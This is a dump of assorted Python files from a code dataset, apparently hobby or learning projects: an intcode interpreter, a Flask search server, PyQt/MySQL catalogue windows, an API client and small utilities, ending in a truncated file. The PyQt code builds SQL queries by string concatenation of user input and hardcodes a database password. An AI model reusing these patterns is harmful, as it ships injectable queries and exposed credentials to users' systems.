+{"seq_id":"195819610","text":"def get_opcode(file_name):\n\twith open(file_name, \"r\") as input_file:\n\t\tinput_string = input_file.read()\n\t\treturn list(map(int, input_string.split(\",\")))\n\nclass Opcode:\n\t# int list: opcode\n\t# int: i\n\t# int: offset\n\t# list: input_queue\n\t# gen: gen\n\t\n\tdef __init__(self, file_name, input_queue = []):\n\t\tself.opcode = get_opcode(file_name)\n\t\tself.inputs = input_queue\n\t\tself.i = 0\n\t\tself.offset = 0\n\t\tself.gen = self.opcode_generator()\n\t\n\tdef set_element(self, position, element):\n\t\twhile len(self.opcode) < position + 1:\n\t\t\tself.opcode.append(0)\n\t\tself.opcode[position] = element\n\t\n\tdef get_element(self, position):\n\t\tif position > len(self.opcode) - 1:\n\t\t\treturn 0\n\t\treturn self.opcode[position]\n\t\n\tdef get_position(self, operation, position):\n\t\tparameter_mode = int(operation[-2 - position])\n\t\tparameter_value = self.get_element(self.i + position)\n\n\t\t# write\n\t\tif position == 3 or (position == 1 and operation[3:5] in [\"03\"]):\n\t\t\tif parameter_mode == 0 or parameter_mode == 1:\n\t\t\t\treturn parameter_value\n\t\t\tif parameter_mode == 2:\n\t\t\t\treturn parameter_value + self.offset\n\t\t# read\n\t\tif parameter_mode == 0:\n\t\t\treturn self.get_element(parameter_value)\n\t\tif parameter_mode == 1:\n\t\t\treturn parameter_value\n\t\tif parameter_mode == 2:\n\t\t\treturn self.get_element(parameter_value + self.offset)\n\t\t\n\tdef opcode_generator(self):\n\t\twhile True:\n\t\t\toperation = str(self.get_element(self.i)).rjust(5, '0')\n\t\t\tinstruction = operation[3:5]\n\t\n\t\t\t# end\n\t\t\tif instruction == \"99\":\n\t\t\t\tbreak\n\t\n\t\t\tpos1 = self.get_position(operation, 1)\n\t\t\t\n\t\t\tif instruction not in [\"03\", \"04\", \"09\"]:\n\t\t\t\tpos2 = self.get_position(operation, 2)\n\t\t\t\n\t\t\t\tif instruction not in [\"05\", \"06\"]:\n\t\t\t\t\tpos3 = 
self.get_position(operation, 3)\n\t\n\t\t\t# add\n\t\t\tif instruction == \"01\":\n\t\t\t\tself.set_element(pos3, pos1 + pos2)\n\t\n\t\t\t\tif str(self.get_element(self.i)).rjust(5, '0') == operation:\n\t\t\t\t\tself.i += 4\n\t\n\t\t\t# mult\n\t\t\telif instruction == \"02\":\n\t\t\t\tself.set_element(pos3, pos1 * pos2)\n\t\n\t\t\t\tif str(self.get_element(self.i)).rjust(5, '0') == operation:\n\t\t\t\t\tself.i += 4\n\t\n\t\t\t# input\n\t\t\telif instruction == \"03\":\n\t\t\t\tyield -2\n\t\t\t\tif len(self.inputs) > 0:\n\t\t\t\t\tself.set_element(pos1, self.inputs.pop(0))\n\t\t\t\telse:\n\t\t\t\t\tself.set_element(pos1, int(input(\"input: \")))\n\t\n\t\t\t\tif str(self.get_element(self.i)).rjust(5, '0') == operation:\n\t\t\t\t\tself.i += 2\n\t\n\t\t\t# output\n\t\t\telif instruction == \"04\":\n\t\t\t\tyield pos1\n\t\t\t\tself.i += 2\n\t\n\t\t\t# jump if !0\n\t\t\telif instruction == \"05\":\n\t\t\t\tif pos1 != 0:\n\t\t\t\t\tself.i = pos2\n\t\t\t\telse:\n\t\t\t\t\tself.i += 3\n\t\n\t\t\t# jump if 0\n\t\t\telif instruction == \"06\":\n\t\t\t\tif pos1 == 0:\n\t\t\t\t\tself.i = pos2\n\t\t\t\telse:\n\t\t\t\t\tself.i += 3\n\t\n\t\t\t# less than\n\t\t\telif instruction == \"07\":\n\t\t\t\tif pos1 < pos2:\n\t\t\t\t\tself.set_element(pos3, 1)\n\t\t\t\telse:\n\t\t\t\t\tself.set_element(pos3, 0)\n\t\n\t\t\t\tif str(self.get_element(self.i)).rjust(5, '0') == operation:\n\t\t\t\t\tself.i += 4\n\t\n\t\t\t# equals\n\t\t\telif instruction == \"08\":\n\t\t\t\tif pos1 == pos2:\n\t\t\t\t\tself.set_element(pos3, 1)\n\t\t\t\telse:\n\t\t\t\t\tself.set_element(pos3, 0)\n\t\n\t\t\t\tif str(self.get_element(self.i)).rjust(5, '0') == operation:\n\t\t\t\t\tself.i += 4\n\t\t\t\n\t\t\t# offset adjustment\n\t\t\telif instruction == \"09\":\n\t\t\t\tself.offset += pos1\n\t\n\t\t\t\tself.i += 2\n\t\t\t\n\t\t\t# oopsie\n\t\t\telse:\n\t\t\t\tprint(self)\n\t\t\t\tbreak\n\t\twhile True:\n\t\t\tyield None\n\t\n\tdef get_next(self):\n\t\treturn next(self.gen)\n\nif __name__ == \"__main__\":\n\topc = Opcode(\"day11_input.txt\", [0])\n\toutput = opc.get_next()\n\twhile output != None:\n\t\tprint(output)\n\t\toutput = opc.get_next()","sub_path":"solutions/aoc_opcode.py","file_name":"aoc_opcode.py","file_ext":"py","file_size_in_byte":3415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"528573158","text":"import datetime\nimport shutil\nfrom flask import Flask, render_template, request, send_from_directory\nfrom invisibleroads_macros import disk, security\nfrom os.path import basename, join\nfrom tempfile import mkdtemp\nfrom run import parse_date\nfrom run import run as run_script\nfrom run import res as res_script\nfrom run import author as author_script\nfrom run import parse_list\n\n\napp = Flask(__name__)\nresults_folder = disk.make_folder('results')\nspecialties = {}\nwith open('specialties.txt', 'r') as f:\n for line in f:\n line = line.split('=')\n if 'Pick a' in line[1]:\n continue\n line[1] = line[1].replace('\\n', '')\n specialties[line[1]] = line[0]\n\n@app.route('/')\ndef index():\n #TODO: Dynamically add journals\n return render_template('index.html')\n\n\n@app.route('/res', methods=['POST'])\ndef res():\n target_folder = mkdtemp()\n author_names = sorted(set(\n request.form.get('author_names', '').splitlines()))\n specialty = request.form.get('specialty')\n if not specialty:\n specialty = None\n spec_value = None\n else:\n spec_value = specialties[specialty]\n \n parse_list(author_names)\n if not author_names:\n err = 'Error: no Author names'\n return 
render_template('response.html', error = err)\n search_names = author_names[:]\n for i,name in enumerate(search_names):\n name = name.split(' ')\n name = ' '.join([name[0], name[(len(name)-1)]])\n search_names[i] = name\n\n result_properties = res_script(target_folder, search_names, specialty, spec_value)\n\n if 'Error' in result_properties:\n return render_template( 'response.html', error=result_properties)\n\n timestamp = datetime.datetime.now().strftime('%Y%m%d-%M%H')\n archive_nickname = '%s-%s' % (\n timestamp, security.make_random_string(16))\n archive_path = join(results_folder, archive_nickname + '.zip')\n disk.compress(target_folder, archive_path)\n return render_template(\n 'response.html',\n archive_name=basename(archive_path),\n result_properties=zip(\n author_names,\n result_properties['residencies'],\n result_properties['med_schools']))\n\n\n@app.route('/author', methods=['POST'])\ndef author():\n target_folder = mkdtemp()\n\n author_names = sorted(set(\n request.form.get('author_names', '').splitlines()))\n try:\n from_date = parse_date(request.form.get('from_date'))\n to_date = parse_date(request.form.get('to_date'))\n except (TypeError, ValueError):\n from_date, to_date = None, None\n\n parse_list(author_names)\n if not author_names:\n err = 'Error: no Author names'\n return render_template('response.html', error = err)\n search_names = author_names[:]\n for i,name in enumerate(search_names):\n name = name.split(' ')\n name = ' '.join([name[0], name[(len(name)-1)]])\n search_names[i] = name\n \n \n result_properties = author_script(target_folder, search_names, from_date, to_date)\n\n timestamp = datetime.datetime.now().strftime('%Y%m%d-%M%H')\n archive_nickname = '%s-%s' % (\n timestamp, security.make_random_string(16))\n archive_path = join(results_folder, archive_nickname + '.zip')\n disk.compress(target_folder, archive_path)\n return render_template(\n 'response.html',\n archive_name=basename(archive_path),\n result_properties=zip(\n result_properties['author_names'],\n result_properties['article_counts']))\n\n\n@app.route('/run', methods=['POST'])\ndef run():\n target_folder = mkdtemp()\n journal_names = sorted(set(\n request.form.get('journal_names', '').splitlines()))\n author_names = sorted(set(\n request.form.get('author_names', '').splitlines()))\n text_terms = sorted(set(\n request.form.get('text_terms', '').splitlines()))\n mesh_terms = sorted(set(\n request.form.get('mesh_terms', '').splitlines()))\n custom_expression = request.form.get('custom_expression', '')\n lists = [journal_names, author_names, text_terms, mesh_terms]\n for l in lists:\n parse_list(l)\n if not journal_names:\n err = 'Error: no Journal names'\n return render_template('response.html', error = err) \n try:\n from_date = parse_date(request.form.get('from_date'))\n to_date = parse_date(request.form.get('to_date'))\n except (TypeError, ValueError):\n from_date, to_date = None, None\n date_interval_in_years = request.form.get('date_interval_in_years')\n if date_interval_in_years:\n date_interval_in_years = int(date_interval_in_years)\n\n result_properties = run_script(\n target_folder, journal_names, text_terms, mesh_terms,\n custom_expression, author_names, from_date,\n to_date, date_interval_in_years)\n\n timestamp = datetime.datetime.now().strftime('%Y%m%d-%M%H')\n archive_nickname = '%s-%s' % (\n timestamp, security.make_random_string(16))\n archive_path = join(results_folder, archive_nickname + '.zip')\n disk.compress(target_folder, archive_path)\n\n\n source_image_path = join(\n 
target_folder, result_properties['image_name'])\n target_image_path = join(results_folder, archive_nickname + '.png')\n shutil.copy(source_image_path, target_image_path)\n return render_template(\n 'response.html',\n archive_name=basename(archive_path),\n image_name=basename(target_image_path),\n result_properties=result_properties)\n \n\n@app.route('/download/')\ndef download(file_name):\n file_path = join(results_folder, basename(file_name))\n return send_from_directory('.', filename=file_path)\n\n\n@app.errorhandler(404)\ndef not_found(error):\n error = '404 Error'\n return render_template('index.html', error=error), 404\n\n\nif __name__ == '__main__':\n #app.run(host='0.0.0.0',port=27973)\n app.run(port=27973, debug=True)\n","sub_path":"serve.py","file_name":"serve.py","file_ext":"py","file_size_in_byte":5967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"221039527","text":"from multiprocessing import Pool\nimport param_spread_alpha_beta\nimport sys\nimport os\n\ndef xfrange(start, stop, step):\n\twhile start < stop:\n\t\tyield start\n\t\tstart += step\n\t\t\ndef sysCall(alpha,beta,sim_run):\n\tos.system('python synthetic_diffusion.py '+str(alpha)+' '+str(beta)+' '+str(sim_run))\n\t\nif __name__ == '__main__':\n\ta1 = 0.1\n\ta2 = 2\n\tstep_a = 0.1\n\tb1 = 1\n\tb2 = 16\n\tstep_b = 1\n\tsim_run = sys.argv[1]\n\tpool = Pool(processes=5) \n\tfor alpha in xfrange(a1,a2,step_a):\n\t\tfor beta in xfrange(b1,b2,step_b):\n\t\t\tpool.apply_async(sysCall, args=(alpha,beta,sim_run))\n\tpool.close()\n\tpool.join()\n\t\t\t\t\t\t","sub_path":"synthetic_topic_diffusion/param_spread_grid_search.py","file_name":"param_spread_grid_search.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"319052674","text":"from PyQt5.QtWidgets import *\r\nimport pymysql\r\nimport sys\r\n\r\ndef conectaBanco():\r\n global con\r\n con = pymysql.connect(host='localhost',user='root',database='db_MeusLivros',cursorclass=pymysql.cursors.DictCursor,password='abc123**')\r\n\r\ndef msgProblemaBD():\r\n msgProblema = QMessageBox()\r\n msgProblema.setWindowTitle('Problema')\r\n msgProblema.setText('Problema ao obter os dados. 
Tente novamente.')\r\n    msgProblema.exec()\r\n\r\ndef msgSucesso():\r\n    msgSucesso = QMessageBox()\r\n    msgSucesso.setWindowTitle('Sucesso!')\r\n    msgSucesso.setText('Registro inserido com sucesso!')\r\n    msgSucesso.exec()\r\n\r\nclass Janela(QMainWindow):\r\n    ''' Classe principal '''\r\n    def __init__(self): # método construtor da classe\r\n        super().__init__()\r\n\r\n        self.topo = 200\r\n        self.esq = 200\r\n        self.alt = 500\r\n        self.lar = 800\r\n        self.titulo = 'Acesso a banco de dados - I'\r\n\r\n        # Criar botão para consulta de editora\r\n        self.btnConsulta = QPushButton('Consultar Livro', self)\r\n        self.btnConsulta.move(150, 50)\r\n        self.btnConsulta.setStyleSheet('background-color:#0000EE;color:red;font:bold')\r\n        self.btnConsulta.setToolTip('Clique aqui para consultar o livro')\r\n        self.btnConsulta.clicked.connect(self.consultaLivro)\r\n\r\n        # Caixas de texto para consulta de livro:\r\n        self.lblLivro = QLabel(self)\r\n        self.lblLivro.move(200,80)\r\n        self.lblLivro.resize(250,30)\r\n        self.lblLivro.setText('Digite o código do livro a pesquisar:')\r\n        self.txtIdLivro = QLineEdit(self)\r\n        self.txtNomeLivro = QLineEdit(self)\r\n        self.txtIdLivro.move(200,105)\r\n        self.txtIdLivro.resize(250,30)\r\n        self.txtNomeLivro.move(200,150)\r\n        self.txtNomeLivro.resize(250,30)\r\n\r\n        # Combobox para exibir resultado da consulta de editoras\r\n        self.lblEditora = QLabel(self)\r\n        self.lblEditora.move(500, 50)\r\n        self.lblEditora.resize(350, 20)\r\n        self.lblEditora.setText('Editoras:')\r\n        self.cmbEditoras = QComboBox(self)\r\n        self.cmbEditoras.move(500,75)\r\n        self.consultaEditoras()\r\n        self.cmbEditoras.addItems(self.listaEditoras)\r\n        self.cmbEditoras.activated.connect(self.informaEditora)\r\n\r\n        # Caixa de texto para mostrar item selecionado no ComboBox\r\n        self.txtEditora = QLineEdit(self)\r\n        self.txtEditora.move(500,110)\r\n        self.txtEditora.resize(200,20) \r\n\r\n        # Caixa de Listagem\r\n        self.listaEd = QListWidget(self)\r\n        self.listaEd.addItems(self.listaEditoras)\r\n        self.listaEd.move(300,250)\r\n        self.listaEd.resize(150,100)\r\n        self.listaEd.addItem('Bóson Books')\r\n        self.listaEd.sortItems() # Ordenar itens da lista\r\n        self.listaEd.clicked.connect(self.informaEditoraLista) \r\n\r\n        # Botão para limpar a lista\r\n        self.btnLimpaLista = QPushButton(self)\r\n        self.btnLimpaLista.setText('Limpar Lista')\r\n        self.btnLimpaLista.move(150,250)\r\n        self.btnLimpaLista.clicked.connect(self.listaEd.clear)\r\n\r\n        # Barra de menus\r\n        self.menu = QMenuBar(self)\r\n        self.menuArquivo = self.menu.addMenu('Arquivo')\r\n        self.menuDados = self.menu.addMenu('Dados')\r\n        self.menuAjuda = self.menu.addMenu('Ajuda')\r\n        # Cadastrar autor\r\n        self.cadastraAutor = QAction('Cadastrar Autor', self)\r\n        self.menuDados.addAction(self.cadastraAutor)\r\n        self.cadastraAutor.triggered.connect(self.abreJanelaAutor)\r\n        # Cadastrar editora\r\n        self.cadastraEditora = QAction('Cadastrar Editora', self)\r\n        self.menuDados.addAction(self.cadastraEditora)\r\n        self.cadastraEditora.triggered.connect(self.abreJanelaEditora)\r\n        # Sair\r\n        self.sair = QAction('Sair', self)\r\n        self.menuArquivo.addAction(self.sair)\r\n        self.sair.triggered.connect(self.fechaApp)\r\n        self.menu.show()\r\n\r\n        self.carregaJanela()\r\n\r\n    \r\n################# Métodos ##################\r\n\r\n    def consultaEditoras(self):\r\n        # Preparar um cursor com o método .cursor()\r\n        try:\r\n            conectaBanco()\r\n            with con.cursor() as c:\r\n                # Criar a consulta e executá-la no banco\r\n                sql = \"SELECT NomeEditora FROM tbl_editoras\"\r\n                c.execute(sql)\r\n                res = c.fetchall()\r\n                # Criar lista com os dados retornados\r\n                self.listaEditoras = []\r\n                for linha in res:\r\n                    self.listaEditoras.append(linha['NomeEditora'])\r\n        except Exception:\r\n            msgProblemaBD()\r\n        finally: \r\n            # Desconectar do servidor\r\n            con.close()\r\n\r\n    def consultaLivro(self):\r\n        try:\r\n            conectaBanco()\r\n            IdLivro = self.txtIdLivro.text()\r\n            with con.cursor() as c:\r\n                sql = \"SELECT NomeLivro FROM tbl_livros WHERE IdLivro = \" + IdLivro + \";\"\r\n                c.execute(sql)\r\n                res = c.fetchone()\r\n                self.txtNomeLivro.setText(res['NomeLivro'])\r\n        except Exception:\r\n            msgProblemaBD()\r\n        finally:\r\n            con.close()\r\n\r\n    def informaEditora(self):\r\n        self.txtEditora.setText(self.cmbEditoras.currentText())\r\n\r\n    def informaEditoraLista(self):\r\n        self.editora = self.listaEd.currentItem()\r\n        self.txtEditora.setText(self.editora.text())\r\n\r\n    def abreJanelaAutor(self):\r\n        self.janelaAutor = JanelaAutor(self)\r\n        self.janelaAutor.show()\r\n\r\n    def abreJanelaEditora(self):\r\n        self.janelaEditora = JanelaEditora(self)\r\n        self.janelaEditora.show()\r\n\r\n    def fechaApp(self):\r\n        self.close()\r\n\r\n    def carregaJanela(self):\r\n        self.setGeometry(self.esq, self.topo, self.lar, self.alt)\r\n        self.setWindowTitle(self.titulo)\r\n        self.setStyleSheet('background-color:lightgreen')\r\n        self.show()\r\n\r\n#------------ Janela de Autores ------------#\r\n\r\nclass JanelaAutor(QMainWindow):\r\n    def __init__(self, parent=None):\r\n        super(JanelaAutor, self).__init__(parent)\r\n\r\n        self.topo = 300\r\n        self.esq = 300\r\n        self.alt = 700\r\n        self.lar = 500\r\n        self.titulo = 'Cadastrar Autores'\r\n\r\n        # Criar botão para cadastro de autores\r\n        self.btnCadastraAutor = QPushButton('Cadastrar Autor', self)\r\n        self.btnCadastraAutor.move(100, 220)\r\n        self.btnCadastraAutor.setStyleSheet('background-color:#0000CC;color:yellow;font:bold')\r\n        self.btnCadastraAutor.setToolTip('Clique aqui para cadastrar um novo autor')\r\n        self.btnCadastraAutor.clicked.connect(self.cadastraAutor)\r\n        self.btnCadastraAutor.clicked.connect(self.carregaAutores)\r\n\r\n        # Caixas de texto para cadastro de autor:\r\n        self.lblNomeAutor = QLabel(self)\r\n        self.lblNomeAutor.move(100,80)\r\n        self.lblNomeAutor.resize(250,30)\r\n        self.lblNomeAutor.setText('Nome do autor:')\r\n        self.txtNomeAutor = QLineEdit(self) \r\n        self.txtNomeAutor.move(100,110)\r\n        self.txtNomeAutor.resize(200,30)\r\n        self.lblSobrenomeAutor = QLabel(self)\r\n        self.lblSobrenomeAutor.move(100,150)\r\n        self.lblSobrenomeAutor.resize(250,30)\r\n        self.lblSobrenomeAutor.setText('Sobrenome do autor:')\r\n        self.txtSobrenomeAutor = QLineEdit(self)\r\n        self.txtSobrenomeAutor.move(100,180)\r\n        self.txtSobrenomeAutor.resize(250,30)\r\n\r\n        # Tabela de Autores\r\n        self.tabelaAutores = QTableWidget(self)\r\n        self.tabelaAutores.move(100,300)\r\n        self.tabelaAutores.resize(250,300)\r\n        \r\n\r\n        self.configuraJanela()\r\n\r\n    def configuraJanela(self):\r\n        self.setGeometry(self.esq, self.topo, self.lar, self.alt)\r\n        self.setWindowTitle(self.titulo)\r\n        self.setStyleSheet('background-color:lightblue')\r\n        self.carregaAutores()\r\n\r\n    def cadastraAutor(self):\r\n        try:\r\n            conectaBanco()\r\n            self.nomeAutor = self.txtNomeAutor.text()\r\n            self.sobrenomeAutor = self.txtSobrenomeAutor.text()\r\n            with con.cursor() as cur: \r\n                sql = \"INSERT INTO tbl_autores (NomeAutor, SobrenomeAutor) VALUES \" + \"('\" + self.nomeAutor + \"','\" + self.sobrenomeAutor + \"');\"\r\n                cur.execute(sql)\r\n                con.commit()\r\n                cur.close()\r\n        except Exception:\r\n            msgProblemaBD()\r\n        else:\r\n            msgSucesso()\r\n        finally:\r\n            con.close()\r\n\r\n    def carregaAutores(self):\r\n        try:\r\n            conectaBanco()\r\n            with con.cursor() as c:\r\n                sql = 'SELECT * FROM tbl_autores;'\r\n                c.execute(sql)\r\n                self.resAutores = c.fetchall()\r\n        except Exception:\r\n            msgProblemaBD()\r\n        else:\r\n            self.linhas = len(self.resAutores)\r\n            self.colunas = len(self.resAutores[0])\r\n            self.tabelaAutores.setRowCount(self.linhas)\r\n            self.tabelaAutores.setColumnCount(self.colunas)\r\n            \r\n            # Ajustar cabeçalho e dimensões da tabela\r\n            self.tabelaAutores.setHorizontalHeaderLabels((list(self.resAutores[0].keys())))\r\n            self.tabelaAutores.horizontalHeader().setSectionResizeMode(QHeaderView.ResizeToContents)\r\n            \r\n            for l in range(self.linhas):\r\n                for c in range(self.colunas):\r\n                    item = (list(self.resAutores[l].values())[c])\r\n                    self.tabelaAutores.setItem(l, c, QTableWidgetItem(str(item)))\r\n        finally: \r\n            # Desconectar do servidor\r\n            con.close()\r\n\t\r\n#------------ Janela de Editoras ------------#\r\n\r\nclass JanelaEditora(QMainWindow):\r\n    def __init__(self, parent=None):\r\n        super(JanelaEditora, self).__init__(parent)\r\n\r\n        self.topo = 100\r\n        self.esq = 300\r\n        self.alt = 550\r\n        self.lar = 500\r\n        self.titulo = 'Cadastrar Editoras' \r\n\r\n        # Caixa de texto para cadastro de editora:\r\n        self.lblNomeEditora = QLabel(self)\r\n        self.lblNomeEditora.move(100,80)\r\n        self.lblNomeEditora.resize(250,30)\r\n        self.lblNomeEditora.setText('Nome da editora:')\r\n        self.txtNomeEditora = QLineEdit(self) \r\n        self.txtNomeEditora.move(100,110)\r\n        self.txtNomeEditora.resize(200,30)\r\n\r\n        # Criar botão para cadastro de editoras\r\n        self.btnCadastraEditora = QPushButton('Cadastrar Editora', self)\r\n        self.btnCadastraEditora.move(100, 150)\r\n        self.btnCadastraEditora.setStyleSheet('background-color:#0000CC;color:yellow;font:bold')\r\n        self.btnCadastraEditora.setToolTip('Clique aqui para cadastrar uma nova editora')\r\n        self.btnCadastraEditora.clicked.connect(self.cadastraEditora)\r\n        self.btnCadastraEditora.clicked.connect(self.carregaEditoras)\r\n\r\n        # Tabela de Editoras\r\n        self.tabelaEditoras = QTableWidget(self)\r\n        self.tabelaEditoras.move(100,200)\r\n        self.tabelaEditoras.resize(250,300)\r\n        \r\n        # Configurar janela\r\n        self.configuraJanela()\r\n\r\n    def configuraJanela(self):\r\n        self.setGeometry(self.esq, self.topo, self.lar, self.alt)\r\n        self.setWindowTitle(self.titulo)\r\n        self.setStyleSheet('background-color:lightblue')\r\n        self.carregaEditoras()\r\n\r\n    def cadastraEditora(self):\r\n        try:\r\n            conectaBanco()\r\n            self.nomeEditora = self.txtNomeEditora.text()\r\n            with con.cursor() as cur: \r\n                sql = \"INSERT INTO tbl_editoras (NomeEditora) VALUES \" + \"('\" + self.nomeEditora + \"');\"\r\n                cur.execute(sql)\r\n                con.commit()\r\n                cur.close()\r\n        except Exception:\r\n            msgProblemaBD()\r\n        else:\r\n            msgSucesso()\r\n        finally:\r\n            con.close()\r\n\r\n    def carregaEditoras(self):\r\n        try:\r\n            conectaBanco()\r\n            with con.cursor() as c:\r\n                sql = 'SELECT * FROM tbl_editoras;'\r\n                c.execute(sql)\r\n                self.resEditoras = c.fetchall()\r\n        except Exception:\r\n            msgProblemaBD()\r\n        else:\r\n            self.linhas = len(self.resEditoras)\r\n            self.colunas = len(self.resEditoras[0])\r\n            self.tabelaEditoras.setRowCount(self.linhas)\r\n            self.tabelaEditoras.setColumnCount(self.colunas)\r\n            \r\n            # Ajustar cabeçalho e dimensões da tabela\r\n            self.tabelaEditoras.setHorizontalHeaderLabels((list(self.resEditoras[0].keys())))\r\n            self.tabelaEditoras.horizontalHeader().setSectionResizeMode(QHeaderView.ResizeToContents)\r\n            \r\n            for l in range(self.linhas):\r\n                for c in 
range(self.colunas):\r\n          item = (list(self.resEditoras[l].values())[c])\r\n          self.tabelaEditoras.setItem(l, c, QTableWidgetItem(str(item)))\r\n    finally: \r\n      # Disconnect from the server\r\n      con.close()\r\n\r\n#-------------- Main Routine --------------#\r\n \r\nif __name__ == '__main__':\r\n  app = QApplication(sys.argv)\r\n  app.setStyle('Fusion')\r\n  tela = Janela()\r\n  sys.exit(app.exec_())\r\n","sub_path":"PyQt - Conexão a banco com PyMySQL (POO).py","file_name":"PyQt - Conexão a banco com PyMySQL (POO).py","file_ext":"py","file_size_in_byte":13203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"87846987","text":"from qsGenerator import queryURLBuilder\r\nfrom TableSchemaCreator import createSchema\r\nfrom TableCreator import populateTable\r\nfrom iDigBioQuery import idigbioQuery\r\nfrom DBInfo import delTable\r\nimport urllib.request\r\nimport urllib.error\r\nimport json\r\nimport sys\r\n\r\n\r\ndef searchRecords(rq, table_name, limit=None):\r\n    '''Function that returns a dictionary of records found using the rq dictionary\r\n    query parameters. Requires the rq dictionary and database table name as\r\n    arguments, parameter \"limit\" is optional (limits no. of records retrieved) \r\n    '''\r\n    #Endpoint for conducting queries through API with rq search terms\r\n    endpoint = \"http://127.0.0.1:5000/\" + table_name + \"/search?\"\r\n    \r\n    #Build query URL using search terms in rq\r\n    url = queryURLBuilder(endpoint, rq, limit)\r\n    \r\n    #Reading data from the URL constructed (requires API Server running)\r\n    try:\r\n        data = urllib.request.urlopen(url)\r\n    except urllib.error.URLError as e:\r\n        print(\"Invalid URL address.\")\r\n        sys.exit(0)\r\n    \r\n    #Convert data read from webpage to JSON format, python dictionary\r\n    result_dict = json.loads(data.read().decode())\r\n    \r\n    return result_dict\r\n\r\n\r\ndef viewRecord(uuid, table_name):\r\n    '''Function that returns a single record from database using the record's\r\n    uuid, which is provided as an argument to the function along with the\r\n    name of the table to be queried\r\n    '''\r\n    #API Endpoint for retrieving individual record by uuid\r\n    endpoint = \"http://127.0.0.1:5000/view/\" + table_name + \"/\"\r\n    \r\n    #URL constructed by appending user defined uuid to endpoint\r\n    url = endpoint + uuid\r\n    \r\n    #Reading data from the URL constructed (requires API Server running)\r\n    try:\r\n        data = urllib.request.urlopen(url)\r\n    except urllib.error.URLError as e:\r\n        print(\"Invalid URL address.\")\r\n        sys.exit(0)\r\n    \r\n    #Converting record to JSON format\r\n    record = json.loads(data.read().decode())\r\n    \r\n    return record\r\n\r\ndef createTable(rq, table_name, limit=None):\r\n    '''Function that allows user to create a table in a PostgreSQL database\r\n    that contains the results of a query to idigbio.\r\n    \r\n    Takes rq dictionary (containing query params),\r\n    table_name string (name of table to be created in DB) and\r\n    limit int (max no. of records to be returned) as arguments.\r\n    '''\r\n    #Conduct query to idigbio, retrieves results as dict\r\n    results = idigbioQuery(rq, limit)\r\n    \r\n    #Create table & appropriate fields based on query result\r\n    createSchema(results, table_name)\r\n    \r\n    #Enter data in query into table\r\n    populateTable(results, table_name)\r\n    \r\n    \r\ndef deleteTable(table_name):\r\n    '''Function for deleting a table from the local database defined in the\r\n    DBInfo script. 
Takes table's name as argument and notifies user of\n success/failure status of deletion.\n '''\n #Table deletion function\n delTable(table_name)\n\n \n \n ","sub_path":"APIPrototype/API.py","file_name":"API.py","file_ext":"py","file_size_in_byte":2914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"113177426","text":"#! /usr/bin/python3 -i\n# Hey this script is meant to be used in a interactive session.\n# dran 04/19\n\nimport time\nimport random\nimport numpy as np\nimport sense_hat\nimport constants as C\n\n\nclass MyOwnHat(sense_hat.SenseHat):\n \n def clear_display(self):\n # this is obviously a little slow but it is less typing :p\n self.set_pixels(C.BLANK)\n \n def random_lights(self,duration):\n \n def _individual_light(hat):\n x = random.randint(0, 7)\n y = random.randint(0, 7)\n hat.set_pixel(x, y, random.choice(C.COLORS_LIST))\n \n start_time = time.time()\n while time.time() - start_time <= duration:\n _individual_light(self)\n time.sleep(0.05)\n \n self.clear_display()\n\nif __name__ == \"__main__\":\n hat = MyOwnHat()\n hat.random_lights(10)\n\n\n \n\n","sub_path":"light_tricks.py","file_name":"light_tricks.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"51758986","text":"import numpy as np\n\ndef mean_squared_error(y_true, y_pred, *args):\n \"\"\"\n # Squared Error derivative\n :param y_true: Class labels {-1 or 1} (discrete)\n :param y_pred: Network output [-1 to 1] (continuous)\n :return:\n \"\"\"\n return y_true - y_pred\n\n\ndef gmean_error(y_true, y_pred, cm_approx, n1, n2):\n \"\"\"\n Geometric Error derivative\n :param y_true: Class labels {-1 or 1}\n :param y_pred: NOT USED\n :param cm_approx: pre-computed approximate confusion matrix (which uses y_preds)\n :param n1: number of class labels (class 0)\n :param n2: number of class lables (class 1)\n :return:\n \"\"\"\n dscale = 16. * n1 * n2\n t = 0.5 * ((1 + y_true) * cm_approx.A[0][0])\n t = t - (0.5 * (1 - y_true) * cm_approx.A[1][1])\n return t / dscale # dscale := 16*n1*n2\n\n\ndef cross_entropy_error(y_true, y_pred, *args):\n \"\"\"\n Cross entropy error\n :param y_true:\n :param y_pred:\n :param cm_approx:\n :param n1:\n :param n2:\n :return:\n \"\"\"\n t_k = (np.float64(y_true) + 1.) / 2. # Convert class label from {-1,1} -> {0,1}\n a_k = (np.float64(y_pred) + 1.) / 2. # Convert net output from {-1,1} into {0,1}\n a_k = np.clip(a_k, 0.00000001, 0.99999999) # Added clip to stop numpy log error\n if a_k != 0:\n t = (t_k / a_k) - ((1 - t_k) / (1 - a_k))\n else:\n t = (t_k / a_k) - ((1 - t_k) / (1 - a_k))\n return t","sub_path":"model/error.py","file_name":"error.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"412128668","text":"# -*- coding: utf-8 -*-\n#\n# Copyright (c) 2013 Red Hat, Inc.\n#\n# This software is licensed to you under the GNU General Public\n# License as published by the Free Software Foundation; either version\n# 2 of the License (GPLv2) or (at your option) any later version.\n# There is NO WARRANTY for this software, express or implied,\n# including the implied warranties of MERCHANTABILITY,\n# NON-INFRINGEMENT, or FITNESS FOR A PARTICULAR PURPOSE. 
